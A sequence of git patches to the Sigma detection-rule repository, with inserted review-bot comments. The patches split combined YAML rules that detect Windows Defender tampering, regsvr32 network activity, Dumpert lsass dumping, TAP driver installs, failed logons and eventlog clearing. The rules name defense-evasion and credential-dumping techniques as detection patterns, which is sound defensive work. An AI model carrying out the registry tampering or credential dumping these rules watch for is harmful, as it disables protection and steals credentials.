- - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
- - HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
- Details: 'DWORD (0x00000001)'
- condition: 1 of them
----
-id: a64e4198-c1c8-46a5-bc9c-324c86455fd4
-logsource:
- product: windows
- category: registry_event
-detection:
- tamper_registry:
- EventType: 'SetValue'
- TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware'
- Details: 'DWORD (0x00000001)'
- condition: tamper_registry
----
-id: 6c0a7755-6d31-44fa-80e1-133e57752680
-logsource:
- product: windows
- category: system
-detection:
- selection3:
- EventID: 7036
- keywords:
- - 'Windows Defender Antivirus Service'
- - 'stopped'
- condition: selection3 and all of keywords
\ No newline at end of file
+ condition: selection
+falsepositives:
+ - Administrator actions
+level: high
\ No newline at end of file
diff --git a/rules/windows/other/win_system_defender_disabled.yml b/rules/windows/other/win_system_defender_disabled.yml
new file mode 100644
index 00000000..15114f1d
--- /dev/null
+++ b/rules/windows/other/win_system_defender_disabled.yml
@@ -0,0 +1,30 @@
+title: Windows Defender Threat Detection Disabled
+id: 6c0a7755-6d31-44fa-80e1-133e57752680
+related:
+ - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
+ type: derived
+description: Detects disabling Windows Defender threat protection
+date: 2020/07/28
+modified: 2021/09/21
+author: Ján Trenčanský, frack113
+references:
+ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md
+status: stable
+tags:
+ - attack.defense_evasion
+ - attack.t1089 # an old one
+ - attack.t1562.001
+logsource:
+ product: windows
+ category: system
+detection:
+ selection3:
+ EventID: 7036
+ keywords:
+ - 'Windows Defender Antivirus Service'
+ - 'stopped'
+ condition: selection3 and all of keywords
+falsepositives:
+ - Administrator actions
+level: high
\ No newline at end of file
diff --git a/rules/windows/registry_event/registry_event_defender_disabled.yml b/rules/windows/registry_event/registry_event_defender_disabled.yml
new file mode 100644
index 00000000..bdff48ba
--- /dev/null
+++ b/rules/windows/registry_event/registry_event_defender_disabled.yml
@@ -0,0 +1,35 @@
+title: Windows Defender Threat Detection Disabled
+id: a64e4198-c1c8-46a5-bc9c-324c86455fd4
+related:
+ - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62
+ type: derived
+description: Detects disabling Windows Defender threat protection
+date: 2020/07/28
+modified: 2021/09/21
+author: Ján Trenčanský, frack113
+references:
+ - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md
+status: test
+tags:
+ - attack.defense_evasion
+ - attack.t1089 # an old one
+ - attack.t1562.001
+logsource:
+ product: windows
+ category: registry_event
+detection:
+ tamper_registry:
+ EventType: SetValue
+ TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware'
+ Details: 'DWORD (0x00000001)'
+ selection2:
+ TargetObject:
+ - 'HKLM\SYSTEM\CurrentControlSet\Services\WinDefend'
+ - 'HKLM\SOFTWARE\Microsoft\Windows Defender'
+ - 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender'
+ Details: 'DWORD (0x00000001)'
+ condition: tamper_registry or selection2
+falsepositives:
+ - Administrator actions
+level: high
\ No newline at end of file
From 4c85858e1229eb08bd4008ffb5827cb97c280477 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:33:47 +0200
Subject: [PATCH 1007/1367] split global sysmon_regsvr32_network_activity.yml
---
 .../dns_query_regsvr32_network_activity.yml | 37 +++++++++++++++++++
 .../sysmon_regsvr32_network_activity.yml | 19 +++-------
 2 files changed, 43 insertions(+), 13 deletions(-)
 create mode 100644 rules/windows/dns_query/dns_query_regsvr32_network_activity.yml
diff --git a/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml b/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml
new file mode 100644
index 00000000..a0299149
--- /dev/null
+++ b/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml
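Review bot: `selection2` in the new registry rule matches `TargetObject` exactly against three bare key paths (`'HKLM\SYSTEM\CurrentControlSet\Services\WinDefend'` and two `Windows Defender` keys) together with `Details: 'DWORD (0x00000001)'`, but a SetValue event carries the full value path (key plus value name) in `TargetObject`, as the rule's own `tamper_registry` entry ending in `\DisableAntiSpyware` shows, so an exact match on a key path presumably never fires. Either `TargetObject|startswith:` over those keys, or enumerating the specific value names of interest, would make the selection live; as written `condition: tamper_registry or selection2` is effectively `tamper_registry` alone. The commit also rewrote these paths from `HKEY_LOCAL_MACHINE\` to `HKLM\` and moved them from the windefend service rule into registry_event (see the removed lines of the win_defender_disabled.yml hunk above); both are reasonable but go beyond a "split" and deserve a line in the commit message.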
@@ -0,0 +1,37 @@
+title: Regsvr32 Network Activity
+id: 36e037c4-c228-4866-b6a3-48eb292b9955
+related:
+ - id: c7e91a02-d771-4a6d-a700-42587e0b1095
+ type: derived
+description: Detects network connections and DNS queries initiated by Regsvr32.exe
+references:
+ - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
+ - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
+tags:
+ - attack.execution
+ - attack.t1559.001
+ - attack.t1175 # an old one
+ - attack.defense_evasion
+ - attack.t1218.010
+ - attack.t1117 # an old one
+author: Dmitriy Lifanov, oscd.community
+status: experimental
+date: 2019/10/25
+modified: 2021/09/21
+logsource:
+ category: dns_query
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\regsvr32.exe'
+ condition: selection
+fields:
+ - ComputerName
+ - User
+ - Image
+ - DestinationIp
+ - DestinationPort
+falsepositives:
+ - unknown
+level: high
\ No newline at end of file
diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
index fd57839c..ade7b307 100644
--- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
+++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
@@ -1,5 +1,5 @@
-action: global
 title: Regsvr32 Network Activity
+id: c7e91a02-d771-4a6d-a700-42587e0b1095
 description: Detects network connections and DNS queries initiated by Regsvr32.exe
 references:
 - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
@@ -15,7 +15,10 @@ tags:
 author: Dmitriy Lifanov, oscd.community
 status: experimental
 date: 2019/10/25
-modified: 2020/08/24
+modified: 2021/09/21
+logsource:
+ category: network_connection
+ product: windows
 detection:
 selection:
 Image|endswith: '\regsvr32.exe'
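Review bot: The new dns_query rule copies `fields:` verbatim from the network_connection variant, including `- DestinationIp` and `- DestinationPort`, which a DNS query event does not carry; `- QueryName` is the field an analyst would want next to `Image` here. The `description` ("network connections and DNS queries") and the `title` still describe the old combined rule, so each half should say which of the two it covers. The selection `Image|endswith: '\regsvr32.exe'` is byte-identical in both files, which is what the `EventID: 3` workaround in a later commit on this page reacts to.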
@@ -28,14 +31,4 @@ fields:
 - DestinationPort
 falsepositives:
 - unknown
-level: high
----
-id: c7e91a02-d771-4a6d-a700-42587e0b1095
-logsource:
- category: network_connection
- product: windows
----
-id: 36e037c4-c228-4866-b6a3-48eb292b9955
-logsource:
- category: dns_query
- product: windows
+level: high
\ No newline at end of file
From 5fc82e5dc6938f83781a50fda285edd0f264c611 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:39:02 +0200
Subject: [PATCH 1008/1367] split global sysmon_tttracer_mod_load.yml
---
 .../process_creation_tttracer_mod_load.yml | 29 +++++++++++++++++++
 .../image_load/sysmon_tttracer_mod_load.yml | 26 +++++------------
 2 files changed, 37 insertions(+), 18 deletions(-)
 create mode 100644 rules/windows/image_load/process_creation_tttracer_mod_load.yml
diff --git a/rules/windows/image_load/process_creation_tttracer_mod_load.yml b/rules/windows/image_load/process_creation_tttracer_mod_load.yml
new file mode 100644
index 00000000..ffccba04
--- /dev/null
+++ b/rules/windows/image_load/process_creation_tttracer_mod_load.yml
@@ -0,0 +1,29 @@
+title: Time Travel Debugging Utility Usage
+id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a
+status: experimental
+related:
+ - id: e76c8240-d68f-4773-8880-5c6f63595aaf
+ type: derived
+description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/
+ - https://twitter.com/mattifestation/status/1196390321783025666
+ - https://twitter.com/oulusoyum/status/1191329746069655553
+author: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'
+date: 2020/10/06
+modified: 2021/09/21
+tags:
+ - attack.defense_evasion
+ - attack.credential_access
+ - attack.t1218
+ - attack.t1003.001
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ selection:
+ ParentImage|endswith: '\tttracer.exe'
+ condition: selection
+falsepositives:
+ - Legitimate usage by software developers/testers
+level: high
\ No newline at end of file
diff --git a/rules/windows/image_load/sysmon_tttracer_mod_load.yml b/rules/windows/image_load/sysmon_tttracer_mod_load.yml
index 955ca591..c4011748 100644
--- a/rules/windows/image_load/sysmon_tttracer_mod_load.yml
+++ b/rules/windows/image_load/sysmon_tttracer_mod_load.yml
@@ -1,5 +1,6 @@
-action: global
 title: Time Travel Debugging Utility Usage
+id: e76c8240-d68f-4773-8880-5c6f63595aaf
+status: experimental
 description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/
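Review bot: The new process_creation rule's only selector is `ParentImage|endswith: '\tttracer.exe'`, i.e. it fires on processes spawned by tttracer, while the `description` promises detection of "usage of Time Travel Debugging Utility"; the start of tttracer.exe itself is not covered unless it creates a child process. If that is deliberate (the interesting event being the traced child), the description should say so; otherwise add an `Image|endswith: '\tttracer.exe'` alternative and OR the two selections. The file also lives under `rules/windows/image_load/` although its logsource category is `process_creation`, which will confuse anyone navigating by directory.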
@@ -7,33 +8,22 @@ references:
 - https://twitter.com/oulusoyum/status/1191329746069655553
 author: 'Ensar Şamil, @sblmsrsn, @oscd_initiative'
 date: 2020/10/06
+modified: 2021/09/21
 tags:
 - attack.defense_evasion
 - attack.credential_access
 - attack.t1218
 - attack.t1003.001
-detection:
- condition: 1 of them
-falsepositives:
- - Legitimate usage by software developers/testers
-level: high
----
-id: e76c8240-d68f-4773-8880-5c6f63595aaf
 logsource:
 product: windows
 category: image_load
 detection:
- selection1:
+ selection:
 ImageLoaded|endswith:
 - '\ttdrecord.dll'
 - '\ttdwriter.dll'
 - '\ttdloader.dll'
----
-id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a
-logsource:
- product: windows
- category: process_creation
-detection:
- selection2:
- ParentImage|endswith:
- - '\tttracer.exe'
+ condition: selection
+falsepositives:
+ - Legitimate usage by software developers/testers
+level: high
\ No newline at end of file
From 4718f914e9005f157ba702ef3042b097f5c969c8 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 21 Sep 2021 10:43:42 +0200
Subject: [PATCH 1009/1367] split global sysmon_hack_dumpert.yml
---
 .../file_event/file_event_hack_dumpert.yml | 27 +++++++++++++++++++
 .../process_creation_hack_dumpert.yml} | 22 +++++----------
 2 files changed, 33 insertions(+), 16 deletions(-)
 create mode 100755 rules/windows/file_event/file_event_hack_dumpert.yml
 rename rules/windows/{file_event/sysmon_hack_dumpert.yml => process_creation/process_creation_hack_dumpert.yml} (71%)
 mode change 100755 => 100644
diff --git a/rules/windows/file_event/file_event_hack_dumpert.yml b/rules/windows/file_event/file_event_hack_dumpert.yml
new file mode 100755
index 00000000..ed3625db
--- /dev/null
+++ b/rules/windows/file_event/file_event_hack_dumpert.yml
@@ -0,0 +1,27 @@
+title: Dumpert Process Dumper
+id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
+related:
+ - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
+ type: derived
+status: experimental
+description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
+author: Florian Roth
+references:
+ - https://github.com/outflanknl/Dumpert
+ - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
+date: 2020/02/04
+modified: 2021/09/21
+tags:
+ - attack.credential_access
+ - attack.t1003 # an old one
+ - attack.t1003.001
+logsource:
+ category: file_event
+ product: windows
+detection:
+ selection:
+ TargetFilename: C:\Windows\Temp\dumpert.dmp
+ condition: selection
+falsepositives:
+ - Very unlikely
+level: critical
\ No newline at end of file
diff --git a/rules/windows/file_event/sysmon_hack_dumpert.yml b/rules/windows/process_creation/process_creation_hack_dumpert.yml
old mode 100755
new mode 100644
similarity index 71%
rename from rules/windows/file_event/sysmon_hack_dumpert.yml
rename to rules/windows/process_creation/process_creation_hack_dumpert.yml
index 8259b12c..962e0bf4
--- a/rules/windows/file_event/sysmon_hack_dumpert.yml
+++ b/rules/windows/process_creation/process_creation_hack_dumpert.yml
@@ -1,21 +1,17 @@
-action: global
 title: Dumpert Process Dumper
+id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
+status: experimental
 description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
 author: Florian Roth
 references:
 - https://github.com/outflanknl/Dumpert
 - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
 date: 2020/02/04
-modified: 2020/08/23
+modified: 2021/09/21
 tags:
 - attack.credential_access
 - attack.t1003 # an old one
 - attack.t1003.001
-falsepositives:
- - Very unlikely
-level: critical
----
-id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
 logsource:
 category: process_creation
 product: windows
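Review bot: `TargetFilename: C:\Windows\Temp\dumpert.dmp` in the new file_event rule is an exact match bound to the default system drive and directory, so a host with a different system drive produces no hit even for the unmodified tool; `TargetFilename|endswith: '\dumpert.dmp'` keeps the intent without that dependency. It is also the only path on this page written as an unquoted scalar; quoting it like the sibling rules avoids surprises if the value ever gains a YAML-significant character. The `critical` level now rests on that single filename, which is worth stating in `falsepositives`/`description` so analysts know what the rule does and does not see.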
@@ -23,12 +19,6 @@ detection: selection: Imphash: '09D278F9DE118EF09163C6140255C690' condition: selection ---- -id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 -logsource: - category: file_event - product: windows -detection: - selection: - TargetFilename: C:\Windows\Temp\dumpert.dmp - condition: selection +falsepositives: + - Very unlikely +level: critical \ No newline at end of file From 0884a70e28c4851f7fa8f5846899b8d29c4c818f Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 10:52:37 +0200 Subject: [PATCH 1010/1367] fix tests.py error --- .../network_connection/sysmon_regsvr32_network_activity.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml index ade7b307..4fed79c6 100644 --- a/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml +++ b/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml @@ -21,6 +21,7 @@ logsource: product: windows detection: selection: + EventID: 3 # need to pass the test "There are rule files with exactly the same detection logic" Image|endswith: '\regsvr32.exe' condition: selection fields: From 06ed7c41af223c9144c38b5e94f36cfc6fb4d4e6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:15:21 +0200 Subject: [PATCH 1011/1367] split clobal win_tap_driver_installation.yml --- .../driver_load_tap_driver_installation.yml | 23 ++++++++++++++ .../win_security_tap_driver_installation.yml | 24 +++++++++++++++ .../builtin/win_tap_driver_installation.yml | 30 +++++-------------- 3 files changed, 54 insertions(+), 23 deletions(-) create mode 100644 rules-unsupported/driver_load_tap_driver_installation.yml create mode 100644 rules/windows/builtin/win_security_tap_driver_installation.yml 
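Review bot: After the split the process_creation rule's only selection is the context line `Imphash: '09D278F9DE118EF09163C6140255C690'`, so a rebuilt Dumpert with a different import table yields no alert while the title still promises detection of the tool, and the `Imphash` field is only present at all when the Sysmon configuration includes IMPHASH in its hash algorithms as far as I know. A sentence in `description` such as `Matches the import hash of the public Dumpert build only; recompiled variants and Sysmon configs without IMPHASH are not covered` would set expectations at `level: critical`. The enclosing `detection:` block starts above this hunk, so I cannot see whether any second selection exists.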
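Review bot: Adding `EventID: 3` to a `category: network_connection` rule only to satisfy the duplicate-logic test hard-codes the Sysmon event ID that the category mapping already supplies, so any backend that maps `network_connection` to a non-Sysmon source now gets a field that does not exist there and the rule silently stops matching. If two rules genuinely have identical logic the right fix is to merge them or link them with a `related:` entry, not to add a no-op field; at minimum the comment should name the colliding rule file so the next maintainer can resolve the duplication. If the line must stay, `# Sysmon only: EventID duplicates the category mapping, see <other rule>` is more honest than the current comment.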
diff --git a/rules-unsupported/driver_load_tap_driver_installation.yml b/rules-unsupported/driver_load_tap_driver_installation.yml new file mode 100644 index 00000000..8e9b1be1 --- /dev/null +++ b/rules-unsupported/driver_load_tap_driver_installation.yml @@ -0,0 +1,23 @@ +title: Tap Driver Installation +id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb +related: + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques +status: experimental +author: Daniil Yugoslavskiy, Ian Davis, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 +logsource: + product: windows + category: driver_load +detection: + selection: + ImagePath|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium diff --git a/rules/windows/builtin/win_security_tap_driver_installation.yml b/rules/windows/builtin/win_security_tap_driver_installation.yml new file mode 100644 index 00000000..93f21154 --- /dev/null +++ b/rules/windows/builtin/win_security_tap_driver_installation.yml @@ -0,0 +1,24 @@ +title: Tap Driver Installation +id: 9c8afa4d-0022-48f0-9456-3712466f9701 +related: + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques +status: experimental +author: Daniil Yugoslavskiy, Ian Davis, oscd.community +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.exfiltration + - attack.t1048 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4697 + ServiceFileName|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium \ No newline at end of file 
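Review bot: The `driver_load` rule filters on `ImagePath|contains: 'tap0901'`, but `ImagePath` is the field of the System 7045 event this was split from, while the other `driver_load` rule in this same commit series (driver_load_powershell_script_installed_as_service.yml) uses `ImageLoaded`, so on the driver-load source this selection most likely never matches — which may be why it landed in rules-unsupported. If the rule is meant to work, `ImageLoaded|contains: 'tap0901'` is the consistent field; if it is intentionally unsupported, a one-line comment saying why would spare the next reader the guess. The `falsepositives` entry also carries the typo `insntallation` (should be `installation`) in all three tap rules.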
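Review bot: The Security rule depends on `EventID: 4697`, which in my experience is only emitted when the "Audit Security System Extension" subcategory is enabled and is not part of the default audit policy, so a fleet without that setting gets no coverage and no signal that the rule is blind. A sentence in `description` such as `Requires the Security System Extension audit subcategory (4697) to be enabled` lets an analyst check the precondition before trusting a negative. The `falsepositives` text has the typo `insntallation`.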
diff --git a/rules/windows/builtin/win_tap_driver_installation.yml b/rules/windows/builtin/win_tap_driver_installation.yml index cc3ce6e7..a7e1f470 100644 --- a/rules/windows/builtin/win_tap_driver_installation.yml +++ b/rules/windows/builtin/win_tap_driver_installation.yml @@ -1,37 +1,21 @@ -action: global title: Tap Driver Installation +id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques status: experimental author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 +modified: 2021/09/21 tags: - attack.exfiltration - attack.t1048 -falsepositives: - - Legitimate OpenVPN TAP insntallation -level: medium -detection: - selection: - ImagePath|contains: 'tap0901' - condition: selection ---- -id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 logsource: product: windows service: system detection: selection: EventID: 7045 ---- -id: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb -logsource: - product: windows - category: driver_load ---- -id: 9c8afa4d-0022-48f0-9456-3712466f9701 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 + ImagePath|contains: 'tap0901' + condition: selection +falsepositives: + - Legitimate OpenVPN TAP insntallation +level: medium \ No newline at end of file From 99f24a95a68e464c8e7337b43192c0b25550ea32 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:19:00 +0200 Subject: [PATCH 1012/1367] split global win_susp_failed_logons_single_source.yml --- .../win_susp_failed_logons_single_source.yml | 27 +++++------------ .../win_susp_failed_logons_single_source2.yml | 29 +++++++++++++++++++ 2 files changed, 37 insertions(+), 19 deletions(-) create mode 100644 rules/windows/builtin/win_susp_failed_logons_single_source2.yml diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index b4ad3b78..e3e971c5 100644 
--- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,9 +1,9 @@ -action: global title: Failed Logins with Different Accounts from Single Source System +id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 -modified: 2021/08/29 +modified: 2021/09/21 tags: - attack.persistence - attack.privilege_escalation @@ -11,14 +11,6 @@ tags: logsource: product: windows service: security -falsepositives: - - Terminal servers - - Jump servers - - Other multiuser systems like Citrix server farms - - Workstations with frequently changing users -level: medium ---- -id: e98374a6-e2d9-4076-9b5c-11bdb2569995 detection: selection1: EventID: @@ -27,12 +19,9 @@ detection: TargetUserName: '*' WorkstationName: '*' condition: selection1 | count(TargetUserName) by WorkstationName > 3 ---- -id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 -detection: - selection2: - EventID: 4776 - TargetUserName: '*' - Workstation: '*' - timeframe: 24h - condition: selection2 | count(TargetUserName) by Workstation > 3 +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source2.yml b/rules/windows/builtin/win_susp_failed_logons_single_source2.yml new file mode 100644 index 00000000..9a85a45b --- /dev/null +++ b/rules/windows/builtin/win_susp_failed_logons_single_source2.yml 
@@ -0,0 +1,29 @@ +title: Failed Logins with Different Accounts from Single Source System +id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 +related: + - id: e98374a6-e2d9-4076-9b5c-11bdb2569995 + type: derived +description: Detects suspicious failed logins with different user accounts from a single source system +author: Florian Roth +date: 2017/01/10 +modified: 2021/09/21 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + product: windows + service: security +detection: + selection2: + EventID: 4776 + TargetUserName: '*' + Workstation: '*' + timeframe: 24h + condition: selection2 | count(TargetUserName) by Workstation > 3 +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium \ No newline at end of file From 332bed79062fbc4540a576dc4eac1d30051d2746 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:22:40 +0200 Subject: [PATCH 1013/1367] split global win_susp_eventlog_cleared.yml --- .../builtin/win_susp_eventlog_cleared.yml | 25 ++++----------- .../win_system_susp_eventlog_cleared.yml | 32 +++++++++++++++++++ 2 files changed, 38 insertions(+), 19 deletions(-) create mode 100644 rules/windows/builtin/win_system_susp_eventlog_cleared.yml diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index ecd5b252..454919e5 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -1,5 +1,5 @@ -action: global title: Eventlog Cleared +id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 type: obsoletes 
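Review bot: The 4776 selection has no failure filter, and 4776 is also written for successful NTLM credential validations (Status 0x0), so `count(TargetUserName) by Workstation > 3` over 24h counts every account a host authenticated with NTLM, not the failed logons the title and description promise, which makes any file or print server a standing hit. Restricting to failures with something like `Status|startswith: '0xC000'` (or the specific bad-password and unknown-user codes) brings the rule back to its stated intent; please confirm the field name against the backend mapping. `TargetUserName: '*'` and `Workstation: '*'` are only existence checks that the aggregation already implies and can be dropped.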
@@ -9,18 +9,12 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/07/09 +modified: 2021/09/21 tags: - attack.defense_evasion - attack.t1070 # an old one - attack.t1070.001 - car.2016-04-002 -falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - - System provisioning (system reset before the golden image creation) -level: high ---- -id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 logsource: product: windows service: security @@ -30,14 +24,7 @@ detection: - 517 - 1102 condition: selection ---- -id: a62b37e0-45d3-48d9-a517-90c1a1b0186b -logsource: - product: windows - service: system -detection: - selection: - EventID: 104 - Source: Microsoft-Windows-Eventlog - condition: selection - +falsepositives: + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) + - System provisioning (system reset before the golden image creation) +level: high \ No newline at end of file diff --git a/rules/windows/builtin/win_system_susp_eventlog_cleared.yml b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml new file mode 100644 index 00000000..c267a4a6 --- /dev/null +++ b/rules/windows/builtin/win_system_susp_eventlog_cleared.yml 
@@ -0,0 +1,32 @@ +title: Eventlog Cleared +id: a62b37e0-45d3-48d9-a517-90c1a1b0186b +related: + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes + - id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 + type: derived +description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution +references: + - https://twitter.com/deviouspolack/status/832535435960209408 + - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 +author: Florian Roth +date: 2017/01/10 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1070 # an old one + - attack.t1070.001 + - car.2016-04-002 +logsource: + product: windows + service: system +detection: + selection: + EventID: 104 + Source: Microsoft-Windows-Eventlog + condition: selection +falsepositives: + - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) + - System provisioning (system reset before the golden image creation) +level: high + From 6368a88ad39b4f9bd893a8dad707818c28db8350 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:28:47 +0200 Subject: [PATCH 1014/1367] split global win_software_discovery.yml --- .../builtin/win_software_discovery.yml | 27 ++++------------ .../process_creation_software_discovery.yml | 31 +++++++++++++++++++ 2 files changed, 37 insertions(+), 21 deletions(-) create mode 100755 rules/windows/process_creation/process_creation_software_discovery.yml diff --git a/rules/windows/builtin/win_software_discovery.yml b/rules/windows/builtin/win_software_discovery.yml index 39148779..9a275488 100644 --- a/rules/windows/builtin/win_software_discovery.yml +++ b/rules/windows/builtin/win_software_discovery.yml 
@@ -1,22 +1,16 @@ -action: global title: Detected Windows Software Discovery +id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/16 +modified: 2021/09/21 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna tags: - attack.discovery - attack.t1518 -level: medium -falsepositives: - - Legitimate administration activities -detection: - condition: 1 of them ---- -id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 logsource: product: windows service: powershell @@ -29,16 +23,7 @@ detection: - '\software\' - 'select-object' - 'format-table' ---- -id: e13f668e-7f95-443d-98d2-1816a7648a7b -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: '\reg.exe' # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion - CommandLine|contains|all: - - 'query' - - '\software\' - - '/v' - - 'svcversion' + condition: selection +level: medium +falsepositives: + - Legitimate administration activities \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_software_discovery.yml b/rules/windows/process_creation/process_creation_software_discovery.yml new file mode 100755 index 00000000..7e296e62 --- /dev/null +++ b/rules/windows/process_creation/process_creation_software_discovery.yml 
